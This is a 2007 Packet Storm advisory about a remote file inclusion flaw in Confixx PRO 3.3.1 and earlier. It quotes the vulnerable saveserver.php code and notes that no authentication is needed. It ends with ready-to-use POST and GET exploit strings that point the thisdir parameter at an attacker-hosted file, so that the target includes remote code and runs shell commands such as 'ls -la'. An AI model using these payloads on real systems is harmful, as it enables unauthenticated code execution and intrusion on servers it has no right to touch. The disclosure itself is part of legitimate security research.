confixx-rfi.txt

2007-07-25T00:00:00
ID PACKETSTORM:58008
Type packetstorm
Reporter H4 / Team XPK
Modified 2007-07-25T00:00:00

Description

                                        
                                            `[*] Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability  
__________________________________________________________________________  
  
[!] Application homepage : http://www.swsoft.com/de/products/confixx/  
[!] Author : H4 / XPK  
[!] Contact : http://xpkzxc.com/  
[!] Bug discovered : 2007-07-21  
[!] Bug published : 2007-07-24  
[!] Risk : Moderate  
  
Do not forget visit our page for new vulnerabilites , information and tools.  
  
---------------------------------------------------------------------  
  
Vuln. code: admin/business_inc/saveserver.php  
  
Lines 8-11  
  
if( !in_array($returnto, $actions) )  
{  
include( $thisdir . "/business_inc/list.php" );  
}  
  
Variable $thisdir is not defined ...  
  
---------------------------------------------------------------------  
  
An attacker does not need to be authenticated to access this file.  
  
[!] Conditions: open_basedir restriction off and allow_url_fopen = on  
  
[!] Exploitation : http://[target]/admin/business_inc/saveserver.php  
  
Post: thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la  
Get: saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la  
  
---------------------------------------------------------------------  
`